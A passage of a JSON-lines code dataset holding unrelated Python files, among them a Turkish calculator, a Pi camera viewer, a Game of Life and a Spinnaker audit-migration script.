input(\"ikinci sayı:\")\n\t\ta = int(a)\n\t\tb = int(b)\n\t\tprint(\"{} * {} = {}\".format(a,b,a*b))\n\n#----------------------------------------------\n\ndef bol(a,b):\n\t# iki sayıyı böler\n\ta = input(\"İlk sayı:\")\n\tif a == \"geri\":\n\t\tsecim(1)\n\telse:\n\t\tb = input(\"İkinci Sayı:\")\n\t\ta = int(a)\n\t\tb = int(b)\n\t\tprint(\"{} / {} = {}\".format(a,b,a/b))\n\n#----------------------------------------------\n\ndef cikar(a,b):\n\t# iki sayıyı çıkarır\n\ta = input(\"İlk sayı:\")\n\tif a == \"geri\":\n\t\tsecim(1)\n\telse:\n\t\tb = input(\"İkinci Sayı:\")\n\t\ta = int(a)\n\t\tb = int(b)\n\t\tprint(\"{} - {} = {}\".format(a,b,a-b))\n\n#----------------------------------------------\n\n\ndef faktoriyel(sayı):\n\t#sayının faktoriyelini bulan fonksiyon\n\tsayı = input(\"Sayı:\")\n\tif sayı == \"geri\":\n\t\tsecim(1)\n\telse:\n\t\tsayı = float(sayı)\n\t\tprint(\"Girdiğin sayının faktoriyeli.\",math.factorial(sayı))\n\n#----------------------------------------------\n\ndef kucuk_yuvarla(a):\n\t# float girilen sayıyı en küçüğe yuvarlar\n\ta = float(input(\"Sayı:\"))\n\tif a == \"geri\":\n\t\tsecim(1)\n\telse:\n\t\tprint(\"Küçüğe Yuvarlanmış hali:\",math.floor(a))\n\n#----------------------------------------------\n\ndef buyuk_yuvarla(a):\n\t# float girilen sayıyı en küçüğe yuvarlar\n\ta = float(input(\"Sayı:\"))\n\tif a == \"geri\":\n\t\tsecim(1)\n\telse:\n\t\tprint(\"Büyüğe Yuvarlanmış hali:\",math.ceil(a))\n\n#----------------------------------------------\n\nsecim(1)\n","sub_path":"hesapmakinesi.py","file_name":"hesapmakinesi.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"509545968","text":"#IMPORTS\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\nimport time\nimport cv2\n\n#CONSTANTS\nSHAPE = (300, 500)\nFRAME_RATE = 85\n#SETUP\ncamera = PiCamera()\ncamera.resolution = SHAPE\ncamera.framerate = FRAME_RATE\nraw = PiRGBArray(camera, size=SHAPE)\n\n#IMPLEMENTATION\ntime.sleep(0.1)\n\nfor frame in camera.capture_continuous(raw, format=\"bgr\", use_video_port=True):\n\timage = frame.array\n\tcv2.imshow(\"Video Stream\", image)\n\tkey = cv2.waitKey(1) & 0xFF\n\traw.truncate(0)\n\tif key == ord(\"q\"):\n\t\tbreak\n","sub_path":"cam_script.py","file_name":"cam_script.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"127155405","text":"\"\"\"\nDivide array into max sets containing equal no of 1s and 0s\n\"\"\"\n\nif __name__ == \"__main__\":\n s = str(input())\n ct, c0, c1 = 0, 0, 0\n if(s.count('0') != s.count('1')):\n ct = -1\n print(ct)\n exit()\n for i in range(0, len(s)):\n if(s[i] == '0'):\n c0 += 1\n elif(s[i] == '1'):\n c1 += 1\n if(c0 > 0 and c1 > 0 and c0==c1):\n print(c0, c1)\n ct += 1\n c0, c1 = 0, 0\n print(ct)\n #input: 0100010101 output: -1\n #input: 0100110101 output: 4\n #input: 0111100001 output: 3\n","sub_path":"Basics/equal0and1s.py","file_name":"equal0and1s.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"272645837","text":"import urllib.request\nimport urllib.parse\nimport requests\nimport json\nimport ssl\n\n\ndef fanyi_urllib(keyword):\n # urllib 版本\n\n context = ssl._create_unverified_context()\n data_dic = {'kw': keyword}\n url = 'https://fanyi.baidu.com/sug'\n headers = {'content-length': '8'}\n\n data = urllib.parse.urlencode(data_dic)\n # print(data)\n req = urllib.request.Request(url=url, data=bytes(data, encoding='utf-8'))\n res = urllib.request.urlopen(req, context=context)\n html = res.read().decode('utf-8')\n\n res_dic = json.loads(html)\n\n print(res_dic['data'][0]['v'])\n\n\ndef fanyi_requests(keyword):\n # requests 版本\n url = 'https://fanyi.baidu.com/sug'\n data = {'kw': keyword}\n\n res = requests.post(url=url, data=data)\n\n html = res.content.decode('utf-8')\n\n html_json = json.loads(html)\n print(html_json['data'][0]['v'])\n\n\nif __name__ == '__main__':\n while True:\n x = input(\"请输入你想翻译的词语,q退出:\")\n if x == 'q':\n break\n fanyi_requests(x)","sub_path":"Baidu_Fanyi.py","file_name":"Baidu_Fanyi.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"605877259","text":"#!/usr/bin/python2.7\n# Copyright 2012 JatLeGo Inc. All Rights Reserved.\n# Author: andyzh1314@gmail.com (Andy Zhau)\n\nimport unittest\n\nfrom dsc.framework import component\nfrom dsc.framework import renderer\nfrom dsc.framework import test_util\n\n\nclass RendererTest(unittest.TestCase):\n\n\n def test_base_renderer(self):\n r = renderer.Renderer()\n c = component.ComponentContent(None, \"foo\", r)\n self.assertEquals(\"foo\", r.RenderContent(c))\n\n def test_json_renderer(self):\n data = {\"foo\": \"bar\", \"fooarr\": [\"foo\", \"bar\"]}\n r = renderer.JsonRenderer()\n c = component.ComponentContent(test_util.FakeDscData(), data, r)\n self.assertEquals('{\"foo\":\"bar\",\"fooarr\":[\"foo\",\"bar\"]}',\n r.RenderContent(c))\n\n def test_json_with_debug(self):\n data = {\"foo\": \"bar\", \"fooarr\": [\"foo\", \"bar\"]}\n r = renderer.JsonRenderer()\n c = component.ComponentContent(test_util.FakeDscData(\n debug_parameters={\"h\": \"\"}), data, r)\n golden_result = (\n\"\"\"{\n \"foo\": \"bar\",\n \"fooarr\": [\n \"foo\",\n \"bar\"\n ]\n}\"\"\")\n self.assertEquals(golden_result, r.RenderContent(c))\n\n def test_django_template_error(self):\n data = {\"foo\": \"bar\", \"fooarr\": [\"foo\", \"bar\"]}\n r = renderer.DjangoTemplateRenderer(\"foo/bar.html\")\n c = component.ComponentContent(test_util.FakeDscData(\n debug_parameters={\"h\": \"\"}), data, r)\n self.assertRaises(ImportError, r.RenderContent, c)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"dsc/framework/renderer_test.py","file_name":"renderer_test.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"148139876","text":"adj = [\"red\", \"big\", \"tasty\"]\nfruits = [\"apple\", \"banana\", \"cherry\"]\n\nfor x in adj:\n for y in fruits:\n print(x, y)\n \nlist = [1,2,3,4]\n\nit = iter(list)\n\nprint(next(it)) #prints 1 and only 2,3,4 will be in the iterator\n\nfor x in it:\n print(x) #prints 2,3,4\n\n \n# it = iter(list)\n \n# while True:\n# print (next(it))\n\n","sub_path":"PythonProject/src/Loops.py","file_name":"Loops.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"108109740","text":"#!/usr/bin/python\n\nimport sys\nsys.path.append(\"..\")\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom data_model import Base, Minigame, Transition\nfrom config import Config\n\nclass DatabaseBuilder():\n _config = None\n\n def __init__(self, _config):\n self._config = _config\n\n def build_database(self):\n self._create_database()\n self._populate_database_schema()\n\n def rebuild_database(self):\n # Let's not drop the db in PROD, just to be safe :)\n self._drop_database()\n self._create_database()\n self._populate_database_schema()\n\n def _get_engine(self, database=\"\"):\n connection_string = ('mysql://%s:%s@%s/%s' %\n (self._config.DATABASE_USERNAME,\n self._config.DATABASE_PASSWORD,\n self._config.DATABASE_SERVER,\n database))\n engine = create_engine(\n connection_string,\n encoding=\"utf8\",\n echo=True)\n return engine\n\n def _create_database(self):\n engine = self._get_engine()\n conn = engine.connect()\n # Do not substitute user-supplied database names here.\n conn.execute(\"CREATE DATABASE `%s`\" % self._config.DATABASE_NAME)\n conn.execute(\"COMMIT\")\n conn.close()\n\n def _populate_database_schema(self):\n # Get a new engine for the just-created database and create a table.\n engine = self._get_engine(self._config.DATABASE_NAME)\n conn = engine.connect()\n Base.metadata.create_all(engine)\n conn.execute(\"COMMIT\")\n conn.close()\n\n session = scoped_session(sessionmaker(\n autocommit=False,\n autoflush=False,\n bind=engine))\n\n session.add(Minigame(MinigameId=1, Name=\"Art Master\"))\n session.add(Transition(MinigameId=1, StateTo=0))\n session.add(Transition(MinigameId=1, StateFrom=0, StateTo=2))\n session.add(Transition(MinigameId=1, StateFrom=2, StateTo=3))\n session.add(Transition(MinigameId=1, StateFrom=3, StateTo=4))\n\n session.add(Minigame(MinigameId=2, Name=\"Sentenced To Death\"))\n session.add(Transition(MinigameId=2, StateTo=1))\n session.add(Transition(MinigameId=2, StateFrom=1, StateTo=2))\n session.add(Transition(MinigameId=2, StateFrom=2, StateTo=3))\n session.add(Transition(MinigameId=2, StateFrom=3, StateTo=4))\n session.commit()\n session.close()\n\n def _drop_database(self):\n engine = self._get_engine()\n conn = engine.connect()\n conn.execute(\"DROP DATABASE IF EXISTS `%s`\" % self._config.DATABASE_NAME)\n conn.execute(\"COMMIT\")\n conn.close()\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n usage = (\n \"Usage: ./create_database.py ARGS\\n\"\n \"--dev\\tcreate dev database\\n\"\n \"--prod\\tcreate prod database\")\n print(usage)\n elif sys.argv[1] == \"--prod\":\n db_builder = DatabaseBuilder(Config)\n db_builder.build_database()\n elif sys.argv[1] == \"--dev\":\n db_builder = DatabaseBuilder(Config)\n db_builder.rebuild_database()\n else:\n print(\"Invalid arguments\")\n","sub_path":"service/artmaster/artmaster/database/create_database.py","file_name":"create_database.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"319417346","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nejercicio 4\r\nWrite a Python program to read a file line by line and store it into a list.\r\n\r\n\"\"\"\r\n\r\ndef file_read(fname):\r\n with open(fname) as f:\r\n content_list = f.readlines()\r\n print(content_list)\r\n\r\nfile_read('eduardo.txt')","sub_path":"pythonfile/exer4.py","file_name":"exer4.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"97897068","text":"#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# Complete the birthdayCakeCandles function below.\r\ndef birthdayCakeCandles(ar):\r\n birth=ar[0]\r\n t=0\r\n count=0\r\n while tbirth:\r\n birth=ar[t]\r\n t+=1\r\n d=0\r\n while d\n.. moduleauthor:: Joshua Freimark\n\"\"\"\n# allow for input from terminal\nfrom sys import argv\n\ndef neighbors(grid, row, cell):\n \"\"\"\n Calculate the sum of the neighbors of element being evaluated\n :param row, cell: arguements for cells active\n :type integers: a integer object from grid\n\n :return: the sum of neighbors to make decision\n :rtype: integer\n \"\"\"\n on_count = (grid[row-1][cell-1] + grid[row-1][cell] + grid[row-1][cell+1] +\n grid[row][cell-1] + (grid[row][cell]*0)+ grid[row][cell+1] +\n grid[row+1][cell-1] + grid[row +1][cell] + grid[row +1][cell+1])\n return on_count\n\ndef make_move( grid, nrows, ncols):\n \"\"\"\n Function iterates over grid and evaluates the neigbors of '0'/'1' values\n :param grid,row, cell: arguements for iterating over grid\n :type lists, integers: Array of lists, and integer object from grid\n\n :return: the new grid\n :rtype: Array/2-d list\n \"\"\"\n new_grid = [[0] * ncols for i in range(nrows)] # For new grid to post decisions\n for row in range(nrows-1):\n for cell in range(ncols-1):\n on_count = neighbors(grid, row, cell)\n if grid[row][cell] == 1: # If cells alive\n if (on_count == 2) or (on_count == 3):\n new_grid[row][cell] = 1 # b. Any “on” cell with two or three “on” neighbors remains “on”.\n else: # c. Any “on” cell with more than three “on” neighbors is turned “off”.\n # a. Any “on” cell with fewer than two live neighbors is turned “off”.\n new_grid[row][cell] = 0\n\n elif grid[row][cell] == 0: # If cells dead\n if on_count == 3:\n new_grid[row][cell] = 1 # d. Any “off” cell with exactly three live neighbors is turned “on”.\n else:\n new_grid[row][cell] = 0\n\n return new_grid\ndef initiate(coordinates, grid, nrows, ncols):\n \"\"\"\n Function iterates over grid and implements starting coordinates\n :param coordinates,grid, nrows, ncells: arguements for: 'Alive' cells, and iterating over grid\n :type lists, lists, integers:List of integers, 2-d lists, and integer object from grid\n\n :return: the new grid\n :rtype: Array/2-d list\n \"\"\"\n\n for item in coordinates:\n row, col = item.split(\":\")\n grid[int(row)][int(col)] = 1\n #make_move(grid, nrows, ncols)\n\ndef print_grid(grid, nrows, ncols):\n \"\"\"\n Function makes grid of '-'/'X' for alive/dead cells\n :param grid, nrows, ncells: arguements for: making dimensions of 2-d structure and\n :type lists, integers: 2-d lists, and integer object from grid\n\n :return: the new grid\n :rtype: Array/2-d list\n \"\"\"\n string_grid = \"\" # empty string for terminal output\n for row in range(nrows-1) :\n for cell in range(ncols-1):\n if grid[row][cell] == 0:\n string_grid += '-' # every 0 int is replaced with '-' character\n elif grid[row][cell] == 1:\n string_grid += 'X' # every 1 int is replaced with 'X' character\n string_grid += '\\n' # Indicates the end of the list\n print(string_grid)\n #initiate(coordinates, grid, nrows, ncols)\n\ndef main(*argv):\n \"\"\"\n Function extracts command from terminal and prompts parsing\n :param *argv: arguements for: all arguements from terminal\n :type lists: list of all arguements\n\n :return: the final string grid\n :rtype: string of '-'/'X'\n \"\"\"\n nrows = 31 # dimensions greater than needed to ignore values that exceed my normal list dimensions\n ncols = 81\n ticks = (int(argv[1])) #returns a string of ticks from terminal, -1 to make only '50' iterations\n\n coordinates = argv[2:] # returns a string of 'coordinates from terminal'\n grid = [[0] * ncols for i in range(nrows)] # makes grid, good\n print_grid(grid, nrows, ncols) # checks string grid, good\n initiate(coordinates, grid, nrows, ncols) #forms starting coordinates, good\n print_grid(grid, nrows, ncols) #checks starting coordinates, good\n new_grid = make_move(grid, nrows, ncols) # Makes decisions, good for first iteration\n print_grid(new_grid, nrows, ncols) # check decisions, good\n while ticks > 1: #while loop for iterations\n new_grid = make_move(new_grid, nrows, ncols)\n print_grid(new_grid, nrows, ncols)\n ticks -= 1\n\nmain(*argv)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"233882715","text":"import datetime\nimport json\nimport uuid\nimport psycopg2\nimport sys\nimport requests\n\n\ndef perform_migration():\n try:\n print('Migrating from v3.9.x to v3.10')\n url = 'https://api.github.com'\n hosturl = 'https://github.com'\n alter_approval_gate_approval()\n print(\"Altered table approval_gate_approval in visibilitydb\")\n modifyOpsmxdb()\n print(\"Altered column verification_type value of table userservicetemplate in opsmdb\")\n print(\"Alter autopilot db table entropy\")\n updatescript()\n modifyGit(hosturl)\n print(\"Modified config data of Datasource type 'GIT'\")\n modifygitname()\n print(\"Modified config data of Datasource type 'GIT to GITHUB'\")\n modifyGithub(hosturl, url)\n print(\"Modified config data of Datasource type 'GITHUB'\")\n platform_conn.commit()\n visibility_conn.commit()\n opsmxdb_conn.commit()\n print(\"***** Successfully migrated table data for visibility, opsmx, platform\")\n print(\"Migrating Audit details to v3.10\")\n perform_Audit_migration()\n print(\"Migrating policy audits\")\n policy_audits = fetch_policy_audit()\n migrate_policy_audit(policy_audits)\n print(\"Successfully migrated policy audits\")\n audit_conn.commit()\n print(\"***** Successfully migrated audit details\")\n except Exception as e:\n audit_conn.rollback()\n print('Exception occurred during migration : ', e)\n finally:\n audit_conn.close()\n oesdb_conn.close()\n\n\ndef perform_Audit_migration():\n try:\n print(\"Checking spinnaker configuration in oes db\")\n verifySpinnakerConfigurationAndGetURL()\n print(\"Spinnaker configured url \" + url)\n print(\"Fetch spinnaker applications\")\n applications = fetchSpinnakerApplication(url)\n print(\"List of spinnaker application names :\" + ', '.join(applications))\n applicationPipelineDict = fetchSpinnakerPipelineExecutionByApp(applications, url)\n applicationPipelineConfigDict = fetchSpinnakerPipelineConfigExecution(applications, url)\n migratePipelineExecutions(applicationPipelineDict)\n migratePipelineConfigExecutionS(applicationPipelineConfigDict)\n except Exception as e:\n print('Exception occurred during fetching spinnaker pipeline applications : ', e)\n raise e\n\n\ndef verifySpinnakerConfigurationAndGetURL():\n try:\n cur = oesdb_conn.cursor()\n cur.execute(\"select id,url from spinnaker;\")\n result = cur.fetchall()\n if result is None:\n raise Exception(\"Please configure spinnaker before proceeding with audit migration\")\n except Exception as e:\n print(\"Exception occurred while fetching spinnaker configuration from oes db: \", e)\n raise e\n\n\n\ndef fetchSpinnakerApplication(url):\n try:\n url = url + \"/applications\"\n headers = {'Cookie': session_id}\n response = requests.get(url=url, headers=headers).json()\n applications = [res.get('name') for res in response]\n except Exception as e:\n print(\"Exception occurred while fetching spinnaker applications : \", e)\n raise e\n return applications\n\n\ndef fetchSpinnakerPipelineExecutionByApp(applications, url):\n applicationPipelineDict = []\n try:\n url = url + \"/applications/{application}/pipelines\"\n appcount = 0\n for application in applications:\n updated_url = str(url).replace('{application}', application)\n headers = {'Cookie': session_id}\n response = requests.get(url=updated_url, headers=headers)\n if response.json() != []:\n # print(\"SPINNAKER APPLICATION - \" + application + \" PIPELINE DETAILS: \" + str(response.json()))\n pipelineArray = {application: json.loads(response.content)}\n appcount += 1\n print(\"Total application pipeline executions : \" + str(appcount))\n applicationPipelineDict.append(pipelineArray)\n except Exception as e:\n print(\"Error : Please check spinnaker connection with active sessionId\")\n print(\"Exception occurred while fetching spinnaker pipeline execution : \", e)\n raise e\n return applicationPipelineDict\n\n\ndef fetchSpinnakerPipelineConfigExecution(applications, url):\n applicationPipelineConfigDict = []\n try:\n url = url + \"/applications/{application}/pipelineConfigs\"\n appcount = 0\n for application in applications:\n updated_url = str(url).replace('{application}', application)\n headers = {'Cookie': session_id}\n response = requests.get(url=updated_url, headers=headers)\n if response.json() != []:\n # print(\"SPINNAKER APPLICATION - \" + application + \" PIPELINE CONFIG DETAILS: \" + str(response.json()))\n pipelineArray = {application: json.loads(response.content)}\n appcount += 1\n print(\"Total application pipeline config executions \" + str(appcount))\n applicationPipelineConfigDict.append(pipelineArray)\n except Exception as e:\n print(\"Error : Please check spinnaker connection with active sessionId\")\n print(\"Exception occurred while fetching spinnaker pipeline execution : \", e)\n raise e\n return applicationPipelineConfigDict\n\n\ndef migratePipelineExecutions(applicationPipelineDict):\n try:\n startcount = 0;\n savedCount = 0;\n rejectedCount = 0;\n rejectedPipelineExecutionJson = []\n rejectedAppList = set()\n for applicationPipelines in applicationPipelineDict:\n for application, pipelineExecutions in applicationPipelines.items():\n for pipelineExecution in pipelineExecutions:\n startcount += 1\n print(\"********** Received Pipeline Execution count::\" + str(startcount))\n if 'id' in pipelineExecution and 'buildTime' in pipelineExecution and 'status' in pipelineExecution:\n eventId = getEventId(pipelineExecution)\n if eventId != None:\n pipelineExecutionJson = json.dumps(pipelineExecution)\n executionId = pipelineExecution['id']\n print(\n \"Started inserting pipeline execution details application Id - \" + application + \" and execution Id: \" + executionId)\n if isDataAlreadyPresent(application, executionId) == False:\n if getPipelineStatus(pipelineExecution['status']) != None:\n pipeline_upper_json = \"\"\"{\"details\": { \"source\": \"orca\",\"type\": \"orca:pipeline:{status}\",\"created\":{created},\"application\": \"{application}\",\"requestHeaders\": {}},\"content\": {\"execution\":\"\"\"\n pipeline_lower_json = \"\"\",\"executionId\": \"{executionId}\"},\"eventId\": \"{eventId}\"}\"\"\"\n created = pipelineExecution['buildTime']\n status = getPipelineStatus(pipelineExecution['status'])\n print(\n \"** Extracted Data executionId: \" + executionId + \",status: \" + status + \",created: \" + str(\n created) + \",eventId: \" + eventId)\n updated_pipeline_upper_json = pipeline_upper_json.replace('{status}',\n status).replace(\n '{created}', str(created)).replace('{application}', application)\n updated_pipeline_lower_json = pipeline_lower_json.replace('{executionId}',\n executionId).replace(\n '{eventId}', eventId)\n updated_pipeline_execution = json.loads(\n updated_pipeline_upper_json + pipelineExecutionJson + updated_pipeline_lower_json)\n updated_pipeline_execution_Json = json.dumps(updated_pipeline_execution)\n # print(\"Updated Pipeline execution details for application : \" + application + \" :: \" + updated_pipeline_execution_Json)\n insertPipelineExecutionData(eventId, updated_pipeline_execution_Json)\n savedCount += 1\n print(\"********** Saved Pipeline Execution count::\" + str(savedCount))\n else:\n rejectedCount += 1;\n rejectedAppList.add(str(application))\n print(\"********** Received Rejected count of Pipeline Execution count::\" + str(\n rejectedCount) + \" application : \" + str(application))\n rejectedPipelineExecutionJson.append(str(pipelineExecution));\n print(\"Total Received count : \" + str(startcount))\n print(\"Total Saved count : \" + str(savedCount))\n print(\"Total Rejected count : \" + str(rejectedCount) + \" Rejected App list :\" + str(rejectedAppList))\n except Exception as e:\n print(\"Exception occurred while updating pipeline execution data : \", e)\n raise e\n\n\ndef getEventId(pipelineExecution):\n if 'eventId' in pipelineExecution['trigger']:\n eventId = pipelineExecution['trigger']['eventId']\n elif ('parentExecution' in pipelineExecution['trigger'] and 'trigger' in pipelineExecution['trigger'][\n 'parentExecution'] and 'eventId' in pipelineExecution['trigger']['parentExecution']['trigger']):\n eventId = pipelineExecution['trigger']['parentExecution']['trigger']['eventId']\n else:\n eventId = str(uuid.uuid4())\n return eventId\n\n\ndef getPipelineStatus(pipelineStatus):\n if pipelineStatus == \"TERMINAL\":\n return \"failed\"\n elif pipelineStatus == \"SUCCEEDED\":\n return \"complete\"\n elif pipelineStatus == \"RUNNING\":\n return \"starting\"\n elif pipelineStatus == \"CANCELED\":\n return \"failed\"\n elif pipelineStatus == \"NOT_STARTED\":\n return \"failed\"\n\n\ndef insertPipelineExecutionData(eventId, updated_pipeline_execution):\n try:\n cur = audit_conn.cursor()\n date_time = datetime.datetime.now()\n data = date_time, date_time, updated_pipeline_execution, eventId, 'spinnaker'\n cur.execute(\n \"INSERT INTO audit_events (created_at, updated_at,data,event_id,source) VALUES (%s, %s, %s, %s, %s)\",\n data)\n print(\"Successfully inserted data into audit_events table\")\n except Exception as e:\n print(\"Exception occurred while inserting data into audit_events table : \", e)\n raise e\n\n\ndef isDataAlreadyPresent(application, executionId):\n try:\n cur = audit_conn.cursor()\n cur.execute(\n \"SELECT count(*) FROM audit_events WHERE data -> 'content' -> 'execution' ->> 'application' = '\" + application + \"' AND data -> 'content' ->> 'executionId' = '\" + executionId + \"'\")\n result = cur.fetchone()[0]\n if result > 0:\n return bool(True)\n else:\n return bool(False)\n except Exception as e:\n print(\"Exception occurred while fetch data into audit_events table : \", e)\n raise e\n\n\ndef migratePipelineConfigExecutionS(applicationPipelineDict):\n try:\n startcount = 0;\n savedCount = 0;\n rejectedCount = 0;\n rejectedPipelineExecutionJson = []\n rejectedAppList = []\n for applicationPipelines in applicationPipelineDict:\n for application, pipelineConfigExecutions in applicationPipelines.items():\n for pipelineExecutionConfig in pipelineConfigExecutions:\n startcount += 1\n print(\"********** Received Pipeline config Execution count::\" + str(startcount))\n if 'name' in pipelineExecutionConfig and 'lastModifiedBy' in pipelineExecutionConfig and 'application' in pipelineExecutionConfig and 'id' in pipelineExecutionConfig and 'updateTs' in pipelineExecutionConfig:\n pipeline_config_upper_json = \"\"\"{\"content\": {\"name\": \"savePipeline\",\"context\": {\"user\": \"{user}\",\"application\": \"{appName}\",\"pipeline.id\": \"{pipelineId}\",\"pipeline.name\": \"{pipelineName}\"}, \"execution\": {\"stages\": [{ \"status\": \"SUCCEEDED\"}]}}}\"\"\"\n user = pipelineExecutionConfig['lastModifiedBy']\n application = pipelineExecutionConfig['application']\n pipelineId = pipelineExecutionConfig['id']\n pipelineName = pipelineExecutionConfig['name']\n updatedTime = pipelineExecutionConfig['updateTs']\n print(\n \"** Extracted pipeline config Data user: \" + user + \",application: \" + application + \",pipelineId: \" + pipelineId + \",pipelineName: \" + pipelineName)\n updated_pipeline_config_upper_json = json.loads(\n pipeline_config_upper_json.replace('{user}', user).replace('{appName}',\n application).replace(\n '{pipelineId}', pipelineId).replace('{pipelineName}', pipelineName))\n updated_pipeline_config_execution_Json = json.dumps(updated_pipeline_config_upper_json)\n print(\n \"Updated Pipeline config execution details for application : \" + application + \" :: \" + updated_pipeline_config_execution_Json)\n eventId = uuid.uuid4()\n insertPipelineConfigExecutionData(updatedTime, eventId, updated_pipeline_config_execution_Json)\n savedCount += 1\n print(\"********** Saved Pipeline Execution count::\" + str(savedCount))\n else:\n rejectedCount += 1;\n rejectedAppList.append(str(application))\n print(\"********** Received Rejected count of Pipeline config Execution count::\" + str(\n rejectedCount) + \" application : \" + str(application))\n rejectedPipelineExecutionJson.append(str(pipelineExecutionConfig));\n print(\"Total Received count : \" + str(startcount))\n print(\"Total Saved count : \" + str(savedCount))\n print(\"Total Rejected count : \" + str(rejectedCount) + \" Rejected App list :\" + str(rejectedAppList))\n except Exception as e:\n print(\"Exception occurred while updating pipeline execution data : \", e)\n raise e\n\n\ndef insertPipelineConfigExecutionData(updatedTime, eventId, updated_pipeline_config_execution):\n try:\n cur = audit_conn.cursor()\n # date_time = datetime.datetime.now()\n updatedTime_date_time = datetime.datetime.utcfromtimestamp(int(updatedTime) / 1000)\n data = str(updatedTime_date_time), str(updatedTime_date_time), updated_pipeline_config_execution, str(\n eventId), 'spinnaker '\n cur.execute(\n \"INSERT INTO audit_events (created_at, updated_at,data,event_id,source) VALUES (%s, %s, %s, %s, %s)\",\n data)\n print(\"Successfully inserted pipeline config data into audit_events table\")\n except Exception as e:\n print(\"Exception occurred while inserting pipeline config data into audit_events table : \", e)\n raise e\n\n\ndef getGitUsernameBytoken(token, url):\n try:\n url = url + \"/user\"\n headers = {'Authorization': 'token ' + token}\n login = requests.get(url=url, headers=headers).json()\n print(\"git username: \" + login['login'])\n return login['login']\n except Exception as e:\n print(\"Exception occured while getting user name of datasource type GIT : \", e)\n return \" \"\n\n\ndef alter_approval_gate_approval():\n try:\n cur = visibility_conn.cursor()\n cur.execute(\"ALTER TABLE approval_gate_approval ALTER COLUMN approver_comment TYPE TEXT\")\n except Exception as e:\n print(\"Exception occured while altering the approval_gate_parameter table : \", e)\n raise e\n\n\ndef modifyOpsmxdb():\n try:\n cur = opsmxdb_conn.cursor()\n cur.execute(\"select opsmx_id from userservicetemplate where verification_type = null;\")\n result = cur.fetchall()\n if result != None:\n for opsmx_id in result:\n cur.execute(\n \"update userservicetemplate set verification_type = 'VERIFICATION' where opsmx_id=\" + str(opsmx_id))\n except Exception as e:\n print(\"Exception occurred while fetching userservicetemplate data : \", e)\n raise e\n\n\ndef updatescript():\n try:\n cur = opsmxdb_conn.cursor()\n cur.execute(\" ALTER TABLE entropy ALTER COLUMN service_id DROP NOT NULL \")\n print(\"Successfully altered entropy table in autopilot db\")\n except Exception as e:\n print(\"Exception occured while updating script : \", e)\n raise e\n\n\ndef modifyGit(hosturl):\n try:\n cur = platform_conn.cursor()\n cur.execute(\"select id,config from datasource where datasourcetype = 'GIT';\")\n result = cur.fetchall()\n if result != None:\n for data in result:\n configData = json.loads(data[1])\n jdata = {\"hostUrl\": hosturl, \"url\": configData['url'],\n \"username\": getGitUsernameBytoken(configData['token'], configData['url']),\n \"token\": configData['token']}\n updatedConfig = \"'\" + str(json.dumps(jdata)) + \"'\"\n print(\"GIT Datasource Json data of Id:\" + str(data[0]) + \" :\" + updatedConfig)\n cur.execute('update datasource SET config =' + updatedConfig + ' where id =' + str(data[0]))\n except Exception as e:\n print(\"Exception occurred while modify datasource data of GIT: \", e.with_traceback())\n raise e\n\n\ndef modifygitname():\n try:\n cur = platform_conn.cursor()\n cur.execute(\"select id from datasource where datasourcetype = 'GIT';\")\n result = cur.fetchall()\n if result != None:\n for id in result:\n cur.execute(\"update datasource set datasourcetype = 'GITHUB' where id=\" + str(id[0]))\n except Exception as e:\n print(\"Exception occurred while modify datasource data of GIT to GITHUB : \", e)\n raise e\n\n\ndef modifyGithub(hosturl, url):\n try:\n cur = platform_conn.cursor()\n cur.execute(\"select id,config from datasource where datasourcetype = 'GITHUB';\")\n result = cur.fetchall()\n if result != None:\n for data in result:\n configData = json.loads(data[1])\n updateUsername = \" \"\n if 'username' in configData:\n updateUsername = configData['username']\n jdata = {\"hostUrl\": hosturl, \"url\": url, \"username\": updateUsername, \"token\": configData['token']}\n updatedConfig = \"'\" + str(json.dumps(jdata)) + \"'\"\n print(\"GITHUB Datasource Json data of Id: \" + str(data[0]) + \" :\" + updatedConfig)\n cur.execute('update datasource SET config =' + updatedConfig + ' where id=' + str(data[0]))\n except Exception as e:\n print(\"Exception occurred while modify datasource of tpe GITHUB: \", e)\n raise e\n\n\ndef migrate_policy_audit(policy_audits):\n try:\n cur = audit_conn.cursor()\n for policy_audit in policy_audits:\n audit = {\"action\": policy_audit[0],\n \"application\": policy_audit[1],\n \"description\": policy_audit[2],\n \"executionId\": policy_audit[3],\n \"stage\": policy_audit[4],\n \"pipeline\": policy_audit[5],\n \"type\": policy_audit[6],\n \"name\": policy_audit[7],\n \"result\": policy_audit[8],\n \"user\": policy_audit[9]\n }\n\n event_type = \"POLICY_AUDIT\"\n if audit['type'] is not None and audit['type'] == \"EVAL_RUNTIME\":\n event_type = \"POLICY_GATE_AUDIT\"\n\n audit_data = {\n \"eventType\": event_type,\n \"eventId\": str(uuid.uuid4()),\n \"auditData\": audit\n }\n opsmxtime = str(policy_audit[10])\n print(\"Policy data inserting into DB: \" + str(audit_data))\n data = opsmxtime, 